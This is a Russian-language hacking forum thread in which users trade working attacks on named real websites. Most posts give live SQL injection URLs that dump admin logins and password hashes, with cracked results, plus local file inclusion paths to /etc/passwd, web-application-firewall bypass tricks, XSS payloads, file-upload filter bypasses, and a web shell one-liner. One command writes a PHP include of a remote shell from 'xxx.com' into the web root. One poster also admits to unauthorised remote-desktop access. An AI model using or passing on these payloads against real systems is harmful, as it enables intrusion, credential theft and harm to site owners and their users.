Т.е. все дело было в том, чтобы использовать другое поле для вывода??
нет, просто я вывел в другое поле, оно поярче

1 кавычки как и писал Iceangel_
2 коментарий
3 Кавычки в хексе не нужны


Вот твоё
0x27757365727327-- 'users'

А вот моё
0x7573657273 -- users

Народ ответьте мне плиз. Я уже нереально запарился искать. Похоже, что этот NetCat - посследняя надежда. Кто хорошо в PHP шарит, проверьте пожалуйтса скрипт! http://forum.antichat.ru/showpost.php?p=1284711&postcount=7251

Помогите разбраться реально ли тут что нибудь сделать:

http://www.bmwstyle.ru/bmw.php?module=../config

вывод:
Fatal error: Call to undefined function ../configRun() in /srv/www/bmwstyle.ru/inc/core.inc on line 230

При попытке вставить что либо выводит:
ЧТо не может найти фаил
Warning: include(modules//../configd.php) [function.include]: failed to open stream: No such file or directory in /srv/www/bmwstyle.ru/inc/core.inc on line 227

Warning: include() [function.include]: Failed opening 'modules//../configd.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /srv/www/bmwstyle.ru/inc/core.inc on line 227

Fatal error: Call to undefined function /../configdRun() in /srv/www/bmwstyle.ru/inc/core.inc on line 230

Заранее спасибо...

http://www.bmwstyle.ru/bmw.php?module=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00


да, можно скорее всего, только прочитай статью тут про альтернативу нулл-байту

http://www.bmwstyle.ru/bmw.php?module=../../index
это LFI. в значении параметра указывается файл. к этому значению добавляется путь (modules/) и расширение (.php). Нулл-байт не катит. Значит, использовать этот баг получится при условии, что ты зальешь файл с расширением php и будешь знать путь к нему. или как сказал pashkela про альтернативу нулл-байту.

http://www.bmwstyle.ru/bmw.php?cat=3/**/union/**/select/**/1,version(),3,4,5,6/**/limit/**/1,1


шелл не залить, т.к. маджик квотс он + file_priv=n. Пятая ветка

Пробивай админку. А вообще бы .ru не советовал в принципе хекать

http://www.bmwstyle.ru/bmw.php?cat=3/**/union/**/select/**/1,version(),3,4,5,6/**/limit/**/1,1


шелл не залить, т.к. маджик квотс он + file_priv=n. Пятая ветка

Пробивай админку. А вообще бы .ru не советовал в принципе хекать


C SQL'eм я и так давно вопрос решил разобрал и тд. но админка не пашет... =(

Меня больше не хек а методы обхода интересуют в данной ситуации, сайт случайно попал =)

http://www.bmwstyle.ru/bmw.php?module=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://www.vtnews.vt.edu/story.php?relyear=2009+union+select+[22 колонки]--&itemno=181'


method not implemented

mod security режет видать... пробовал в разных регистрах писать юнион селект, постом слать - не проходит..

что нибудь можно сделать?

Угу, запрет на "union+select" и "substring". Хз че там делать.

вопрос по XSS.
Объясните мне пжалуста, вот к примеру есть на неком сайте пассивная XSS, предположим строка поиска, на вбивании туда поискового запроса в url он потом неотображается (т.е. непишется переменная=мой_запрос) как в этом случаю испольщовать эту пассивную XSS ?

негневайтесь, я только учусь.

Поставь снифер приблуду которая отслеживает http-заголовки при нажатии на кнопку "Начать поиск" или "Поиск" или как она там называется. Да, очень часть в целях безопасности визуально стали скрывать передающиеся параметры, но это не значит, что их там нет. Есть для FF такая штука, называется LiveHTTPHeaders, иногда очень полезная бывает

Ребят такой вопрос.Можно ли как то открыть порт радмина на другом компе?
Радмин там запущен,а фаер не пускает.Адрес даже не пингуется.Все действие происходит в локальной сети.
Стоял касперский на том компе и нод - один фиг.В касперском выставлял разрещение на Remote desctop а толку ноль.
Может есть какие штуки которые вырубят бдительность фаера?

вопрос по XSS.
Объясните мне пжалуста, вот к примеру есть на неком сайте пассивная XSS, предположим строка поиска, на вбивании туда поискового запроса в url он потом неотображается (т.е. непишется переменная=мой_запрос) как в этом случаю испольщовать эту пассивную XSS ?

негневайтесь, я только учусь.


Передаються методом POST данные значит. Напрямую не получиться заюзать. Сможешь сделать на своем сайте html форму там параметр action формы будет уязвимый скрипт. И прицепить автоотправку формы - если на уязвимом сайте не проверяется реферрер - то круто...

+union+select+1,2,version(),4,5,6,7+--+

5.0.77-community-log-
???????????????????????????
что делать если запрос

+union+select+1,2,table_name,4,5,6,7+from+informat ion_schema.tables+--+

не проходит, просто пишет

Not Acceptable

An appropriate representation of the requested resource /text_press_year.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.

+union+select+1,2,column_name,4,5,6,7+from+informa tion_schema.columns+--+

проходит , но не одну колонку не выдает

Передаються методом POST данные значит. Напрямую не получиться заюзать. Сможешь сделать на своем сайте html форму там параметр action формы будет уязвимый скрипт. И прицепить автоотправку формы - если на уязвимом сайте не проверяется реферрер - то круто...

а польщователю что тогда подсовывать ? ссылку на "свой сайт", а от тудова уже будет делать редирект обратно на тот с которого он сцылку заюзал.
я правильно понял ?

Not Acceptable

An appropriate representation of the requested resource /text_press_year.php could not be found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


mod_security, если SecFilterScanPOST Off попробуй постом передать(если скрипт подерживает конечно).

+union+select+1,2,version(),4,5,6,7+--+

5.0.77-community-log-
???????????????????????????
что делать если запрос

+union+select+1,2,table_name,4,5,6,7+from+informat ion_schema.tables+--+

не проходит, просто пишет

Вместо information_schema.tables, напиши information_schema.Tables

а польщователю что тогда подсовывать ? ссылку на "свой сайт", а от тудова уже будет делать редирект обратно на тот с которого он сцылку заюзал.
я правильно понял ?


ага, тока не редирект, а засубмичевание формы

mod_security абсалютно пофигу на регистр символов, хоть так напиши TaBlE_nAmE хоть так tAbLe_nAmE, а вот так может пройти %54able_name

PaCo, сразу видно, что инъекций ты мало крутил ^^
Спорим, прокатит?

PaCo, сразу видно, что инъекций ты мало крутил ^^
Спорим, прокатит?
http://www.opennet.ru/base/sec/mod_security2.txt.html, я тебе не про сам скрипт говорю, а про модуль апача.

2 PaCo

Не прокатывает:
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+inf ormation_schema.tables--+

Прокатывает:
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,TaBle_naMe,4,5,6,7+from+inF orMatiOn_sCheMa.taBLes--+

Кстати возможно я угадал с сайтом ^^

Да, с сайтом угадал.. Прокатывает и просто:

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+inf ormation_schema.Tables--+

:)

да я кокраз его крутил тоже(он один и вылазиет с гугл text_press_year.php), значит так настроен mod_security

еще по XSS.
1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки.
2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?

еще по XSS.
1) есть наиболее удачные сканеры XSS, только чтонибуть актуальное а не 3 летней выдержки.
2) такие сканеры могут сканить только поссивные XSS ?? Есть ли сканеры активных XSS, если есть то как они работают ?


руками хсс искать удобней. имхо

Народ, помогите насчет скули! И было бы не плохо если бы еще и объяснили почему так...

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,2,3,4,5,6,7+from+bertie.phpbb_us ers--

Скуля 5
колонки : phpbb_usersbertieusername, phpbb_usersbertieuser_password - существуют, а ничего не выводится :(

Пробывал связки cast(****+as+binary), convert(****+using+latin1), unhex(hex(*****))
и ничего, все то же самое...

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25F7573657273--

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+bertie.phpbb_users--

думаю требуется это:
admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,column_name,3,4,5,6,7+from+infor mation_schema.columns+where+table_name=0x706870626 25F7573657273--

http://193.109.129.190/index.php?page=text&menu=5&sub=-54+union+select+1,concat_ws(0x3a,username,user_pas sword),3,4,5,6,7+from+bertie.phpbb_users--

думаю требуется это:
admin:$H$9LZ00OBCgmEv2A6/.0VbvqUiJUeNE60


тьху, спс, протупил... просто забыл поставить разделитель 0x3a к примеру, а то все слилось у меня и shema и table и column :)

Да, с сайтом угадал.. Прокатывает и просто:

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,table_name,4,5,6,7+from+inf ormation_schema.Tables--+

:)
подскажите теперь как тут можно узнать имя и пасс админа или пользователя

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,concat_ws(0x3a,username,use r_password),4,5,6,7+from+phpbb_users--+

Подскажите плиз можно ли провести SQL-inj
Строка вида site.ru/?cat=menu'
Если оборсать строка menu'--+ то не ошибки не инфы не выводит...
А вот если menu'+ То инфа выводится как при нормальном запросе

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'menu\'='main'' at line 1

SELECT count(*)/4 as count FROM thum where cat='menu\' or 'menu\'='main'

Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.
http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,concat_ws(0x3a,username,use r_password),4,5,6,7+from+phpbb_users--+
для админов можно и так

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,group_concat(concat_ws(0x3a ,username,user_password)+separator+'<br>'),4,5,6,7+from+phpbb_users+where+user_level=1--+

залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:

Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]

как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php

Идет слеширование кавычек а без них запрос не завершит, ищи числовые данные в передоваемых скрипту значениях, зачастую они идут в запрос без кавычек, и как правило где есть одна скуля на одном сайте есть и другие.

для админов можно и так

http://gurtskaya.ru/text_press_year.php?send=ok&year=&cat='+union+select+1,2,group_concat(concat_ws(0x3a ,username,user_password)+separator+'<br>'),4,5,6,7+from+phpbb_users+where+user_level=1--+
да я тоже прочитал и при таком раскладе выходит это
oxana:c4ca4238a0b923820dcc509a6f75849b
administrator:30f46374c898450c560f8c14999b7ff7-
что это означает первая часть логин а второе как расшифровать

2AET - начни что то читать, а то это не дело так, если учесть что ты еще шелл захочешь залить то тут твоих вопросов будет на 10 страниц, это md5
oxana:c4ca4238a0b923820dcc509a6f75849b - 1
то есть логин - oxana пароль 1

Вторая - это md5 хеш того, что находится в колонке user_password
для расшифровки есть много сервисов, или же самостоятельно брутить с помощью скажем пассворд рековер..

залил шелл как картинку вида image.php.gif на сервер, почитал статьи понял что надо теперь проинклудить, нашел лосал инклуд вида:

Warning: include_once() [function.include]: Failed opening 'CLASS_FILE' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /home/webdev/public_html/......../class.search.php on line 2
Warning: require_once(CLASS_SESSION_ACTION) [function.require-once]
Warning: include_once(CLASS_FILE) [function.include-once]
Fatal error: require_once() [function.require]

как мне используя это запустить шелл? в примерах описал локал инклуд вида .php?id=ит.д. а у меня просто /class.search.php

вот полный путь: http://www.anh.gov.co/scripts/tiny_mce/plugins/ajaxfilemanager/inc/class.search.php

Люди help plz. Я кароч насканил кучу ip нашол дефлотные радминов. и без проксей
подрубился и начал пакостить
1) У радмина v2 or v2.1 есть log где айпишники подрубившихся?
2)если я подключился к дефлотному радмину - это наказуемо (преступление)?
3)Радмин v2 or v2.1 ведёт лог что с токогото ip была запушена какянит прога?
4)Я сижу под NAT'ом с динамичким ip. ADSL
меня могут вычислить?

Всем привет.! Вопрос такой:
Юзаю SIPT 4.0
Все настроил и он оперделил принт поля.
Надо задампить бд... но как? //как настроить прогу
Нада вот так
http://......../i.php?id=.......+limit+0,1
http://......../i.php?id=.......+limit+1,1
.................................................. .......
Руками я не могу делать - много записей.

da
da
net
da

Всем привет.! Вопрос такой:
Юзаю SIPT 4.0
Все настроил и он оперделил принт поля.
Надо задампить бд... но как? //как настроить прогу
Нада вот так
http://......../i.php?id=.......+limit+0,1
http://......../i.php?id=.......+limit+1,1
.................................................. .......
Руками я не могу делать - много записей.

Если 4-ая ветка - table brutforce, потом поля.
Если 5-ая ветка - Get Names From Information_Schema

Чтобы инфу с таблицы тащить:

1. Ставишь галочку на нужных колонках.
2. Выбираешь кол-во записей, которое хочешь вытащить - For MySql From 0 to 1000
3. Нажимаешь Get Data

Все настроил и он оперделил принт поля.
Надо задампить бд... но как? //как настроить прогу
Нада вот так
http://......../i.php?id=.......+limit+0,1
http://......../i.php?id=.......+limit+1,1
.................................................. .......
Руками я не могу делать - много записей.
накатай скрипт для сбора записей)

что можно сделать с этим...
http://imhognito.net/promo.php?t=ub+union+select+1111111,22222222,33333 333,44444444444/*&id=2edf0816d583290eb819f1b4cd946244
?

Вот здесь вот интересная ситуация

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13'

что можно сделать с этим...
http://imhognito.net/promo.php?t=ub+union+select+1111111,22222222,33333 333,44444444444/*&id=2edf0816d583290eb819f1b4cd946244
?

id фильтруется вроде как, а вот как ты юнино подбирал не пойму "t=ub" это помоему просто кейс не относящийся к запросу )

вопрос но XSS
немогу суть уловить. Вот говорят мол если фильтруються некоторые символы, то можно ппробывать использовать их десятичные или 16-ные коды.
Я понимаю что пожно для поссивных XSS, в браузерной строке вместо " вбить %22 и оно сработает как кавычка. А при активных ? при замене " на " или &#x22; нехрена непомогает, притом <тег> ... </тег> должны быть 100% написаны в авном виде без кодов., да и если в нуть скрипта пихнуть че, например alert заменить на его коды то нехрена оно несработает.
Где я неправ ??? поправте.

Вот здесь вот интересная ситуация

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13'

И чем она интересна ?

И чем она интересна ?а ты попробуй поля подобрать и увидешь )

А чо тут подбирать-то:


http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+order+by+1


Но видать запрос сложный, участвует ни одна таблица только, но скуля есть, хоть и блайнд:


http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=0

http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=-13+or+1=1


4-ая ветка:


http://www.ourdarkness.info/index.php?index_step=publicistic&publicistic_step=getSelectedText&publicistic_id=13+and+substring(version(),1,1)=4

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=2'

это слепая инъекция?

да нет, зрячая)
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user(), version())+using+latin1),4,5,6,7,8/*

http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.

http://www.convex.ru/news/news-203.html?=1'
Как-нибудь можно дальше скуль раскрутить?

Ошибка в подвале страницы.
Можно даже вывод сделать
[query: update session set value='last_url|s:51:"/news/news-203.html?=1',session_name=user(),value='";', update_date=now() where session_name='orica7dsmq18otn85ojtmvama3'
error: Duplicate entry 'convex@localhost' for key 1
in file: /home/convex/cms/inc/auto/session.inc at line: 42]
Когда идет упдейт сессии:
_http://www.convex.ru/news/news-203.html?=1',session_name=user(),value='

не работают "комментарии" в MySQL
нашел сайтик там в поле логина нет проверки на '.
ну и выдает при запросе 'union select 1/*


Context info for the following error/warning:
Error: 1024, Query(r) failed:
SELECT u.email, u.userid FROM user u WHERE u.username='1' union select 1/*' AND u.email=''
With result:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/*' AND u.email=''' at line 4
in /local/rnsw/www/32/apache2/maoli/core/library/db.php, 381

call: DB->queryex("r", "SELECT u.email, u.userid
FROM user u
WHERE u.username='1' union select 1/*'
AND u.email=''")


и так дальше в таком же духе... не --, не # не помогает... что можно попробывать?

хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?

хм.. почему когда я в конце запроса ставлю /* то работает, а если -- то нет?

уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?

http://events.wayne.edu/index.php?cat=24'+order+by+2/*
при таком запросе поидее ошибки ведь не должно быть? сколько колонок не подбирал все время таже ошибка...

2slammer
http://www.phpclub.ru/mysql/doc/comments.html

уже разобрался надо просто --+ добавлять и тогда работает. может ктонибудь объяснит в чем принципиальная разница между /* и --+ ?

зависит от версии mysql. Поэтому, не зная заранее, только методом научного тыка

пытаюсь залить шелл через phpmyadmin...

командой
select '<? @include("http://xxx.com/shell.txt"); ?>' into outfile '/usr/local/www/main/shell.php';

выдает ошибку
"Вероятно, размер загружаемого файла слишком велик. Способы обхода данного ограничения описаны в документации "

вес шелла 22кб

как обойти ?по албански не особо шарю

зы версия phpmyadmin 2.11.1.1

Я бы тебе дал код, но это приват. А вообще:


<?=eval($_GET[c])?>


вот этого будет достаточно для инклуда, при любых условиях

прочитал таблицы в information_schema и попробовал достать пароль:
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(concat_ws(0x3a,user_lo gin,%20%20user_pass)+using+latin1),4,5,6,7,8+from+ wp_users/*

но выдает почемуто: Oops Table 'mcli_resources.wp_users' doesn't exist
как такое может быть?

blog_its.wp_users
табла в другой бд
select table_schema from information_schema.tables
ПОЧИТАЙ ПОДПИСЬ jokester (http://forum.antichat.ru/member.php?u=50385) ,КРАСНЫМ ВЫДЕЛЕН0

Админка TIGERADMIN v.9. ХЗ что за админка и как пароли зашифрованы.
Кто что думает ?

jerebear : ta21XwWv/Yggk
jason : taqBB1ZND3PQQ
jtougas : ta5MCLrEnx97A
AquaticManagers : taYnG8mr9LTts

DES

У всех приставка ta в начале почему то, её просто отбрасывать перед брутом..... Вообще можно сбрутить?

можно.

нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен:
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Sca nner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&taskid=8&pv=no

нашел активную xss на mioo. Но докрутить до конца никак не получается.....может быть кто нить объяснит, буду оочень благодарен:
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%22%3E%3Cscript%3Ealert%28%27PTsecurity+Sca nner+Test%27%29%3C%2Fscript%3E%3C%22&list=tasks&taskid=8&pv=no
та значения непосредственно в тег <script> вставляеться(и это пассивка а не активка):
http://www.mioo.ru/podrazdinfpage.php?id=10&prjid=640&ctree=cccccccc&onewnd=%27,%27%27);%20}%20alert(%22test%22);%20%3C/script%3E

PaCo, а можно поподробнее...)

В каком смысле поподробней? Я же дал рабочий пример, а дальше сам, пробел тока убери перед:
%3C/script%3E

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+lati n1),4,5,6,7,8+from+information_schema.columns+wher e+table_name=%27users%27/*

не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей

статьи читаю, такого не нахожу

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(column_name)),4,5,6, 7,8+from+information_schema.columns+where+table_na me=0x7573657273/*


тьфу, вопрос неправильно прочитал, сорри:


Текущая БД:


http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(database())),4,5,6,7 ,8/*


БД, в которых есть табла users:


http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(table_schema)),4,5,6 ,7,8+from+information_schema.columns+where+table_n ame=0x7573657273/*


все таблицы из конркетно текущей БД:


http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(CONCAT_WS(0x3a,table _schema,table_name))),4,5,6,7,8+from+information_s chema.tables+WHERE+table_schema=DATABASE()/*

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,convert(column_name+using+lati n1),4,5,6,7,8+from+information_schema.columns+wher e+table_name=%27users%27/*

не получается конкретизировать запрос под определенную бд. получается высвечивает колонки всех бд с такой таблицей

статьи читаю, такого не нахожу

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0 x3a,table_schema))),4,5,6,7,8+from+information_sch ema.columns+where+table_name='users'/*

Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.

http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-2'+union+select+1,2,unhex(hex(concat(column_name,0 x3a,table_schema))),4,5,6,7,8+from+information_sch ema.columns+where+table_name='users'/*

спасибо, высвечивает хотябы привязанные к бд колоноки, разобраться можно)

Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.
буду пробовать

Там file_priv c неэкранированием кавычек, ищи путь до веб диры и лей через into dumpfile, тем более есть например drupal а там в базе в табличке конфигов лежит полный путь.

...
Узнаем путь в файле phpinfo.php =)
http://www.mcli.dist.maricopa.edu/cares/resources.php?cat=-1'+union+select+1,2,3,'qw',5,6,7,8+from+mysql.user +into+outfile+'/d0/www/sites/www.mcli.dist.maricopa.edu/htdocs/images/d012.jpg'+--+
Oops Access denied for user 'mcliweb'@'%' (using password: YES)

Т.ч. =(
...

http://www.francecruises.com/river62+order+by+12---.html
http://www.francecruises.com/river62+union+select+1,2,3,4,5,6,7,8,9,10,11,12---.html
Хелп... PS: не надо про блинд... Мне нужно вывод сделать.

select * from tblcru_barge left join tblcru_bargetype

скорее всего фиг

group+by+31:

http://www.francecruises.com/hotel-12+union+select+1,2,3,4,5,concat_ws(0x3a,user(),ve rsion(),database()),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31---HotelSaintPaulParis.html

francecruises__2@207.228.228.7:5.0.51-log:francecruises_com_2

В админке инет шопа мона загружать изображения, гружу файл f.php а скрипт переименовывет его в 45s.jpg как этого избежать?

В админке инет шопа мона загружать изображения, гружу файл f.php а скрипт переименовывет его в 45s.jpg как этого избежать?

залей картинку и посмотри, передающиеся пакеты... потом зайлей *.php файл и сравни...

//Если есть пасс, то попробуй приконектиться к phpmyadmin и ам залить шелл, попробуй к ftp/ssh

Krist_ALL, ищи локальный инклуд.

Krist_ALL, ищи локальный инклуд.

Krist_ALL, если хостинг плохой, то можно проверить еще через ReverseIP и пройтись по сторонним сайтам и там уже проинклюдить картинку ;)

фильтр обойти не удалось...
инклуда нет...
ток пхпинфо нашел...
ну лана)

gпас я не знаю. я вошел через инекцию -1' or 1=1 /*' двиг плтный..еще один сайт нашел с таким двигом тож бажный. ммм... не знаю че делать ,пс сменить могу но спалюсь...

и что? к чему твой пост? ты мог бы там дать линк в ПМ, мог бы погуглить слова, что не понятны из моего или поста Снейка...

В админке инет шопа мона загружать изображения, гружу файл f.php а скрипт переименовывет его в 45s.jpg как этого избежать?

пробовать обойти фильтр, в идеале - изучить исходник. Подсказки:

.php
.PHP
image.PHP
image.jpg.php
image.php3
image.php5
image.PHP3
image.PHP5
image.phtml
image.PHTML

Если нет - слушай нюка

ЗЫЖ Хотя 100% еще есть варианты, в общем долго думать, упорствовать и не сдаваться

ЗЗЫЫЖЖ где взять исходник? Изучать сорцы на главной, изучать сорцы админки и etc. Надеятся на тщеславие и жадность лошар всяких

если есть phpinfo() - то обратить внимание, включены ли маджик квотс, если нет - то пробовать %00

если есть регистр глобалс он - пробавть переопределить сессию, особенно если она есть в адресной строке, но тут без LFI отдыхаем

правда есть скуля и некоторые другие условия - то можено и пожжечь

В обещем вариантов миллион и миллиард. Надо искать, главное пытаться

Люди,help. кароч нашол скуль версия 5,всё гуд. Как получить рута на машине. Я имею ввиду как залить шел через sql и как потом его запустить. блин я ламо. помогите плиз.
может ссылки на статьи ачата есть какиенить

Вот хорошая ссылка - https://forum.antichat.ru/search.php

serega393 ну думаю даже если ты ламо то читать все равно умеешь, тема поднималась сотни раз на форуме, а еще человечек Jokester специально для таких как ты создал отдельный топик в уязвимостях

Если какой нибудь способ обойти такую зашиту от sql injection:
if(preg_match('/[^\w-]/',$_POST['id'])) die("wrong <b>id</b>");
далее по коду $_POST['id'] свободно вставляеться в гвери без каких нибудь дополнительных проверок, как я понимаю preg_match бинарнобезопасная функция и ей пофигу на нуль байты и etc.

Доступны логи, в чём проблема?
http://samovar.teaspoon.ru/?what=../../../../../../../../../../../../proc/self/fd/2%00

http://samovar.teaspoon.ru/?what=../../../../../../../../../../../../../../../ETC/PASSWD%00

You will die when I say You must die

WTF??
Мне кажется кто-то спалился. Бага была. теперь её нет

PaCo

Ну, можно попробовать придумать сценарий успешного обхода такой проверки. У меня есть некоторые мысли, но чтоб на практике реализовать это, нужно чтоб совпало слишком много всего. Например, в MySQL 4.0.x можно использовать не-ascii-символы в качестве альтернативы пробельным символам в SQL-запросе. PHP же успешно пропустит некоторые такие символы через эту регулярку (не уверен, что всегда, но у меня получалось такое). Т.е. если SQL-инъекция, например, в параметре WHERE опреатора SELECT, и в этом запросе выбирается одна колонка, то запрос:
id=-1ђunionђselectђpasswordђfromђusers
скорее всего обойдет эту регулярку и успешно выполнится. Теоретически (я не пробовал)... (:

PaCo

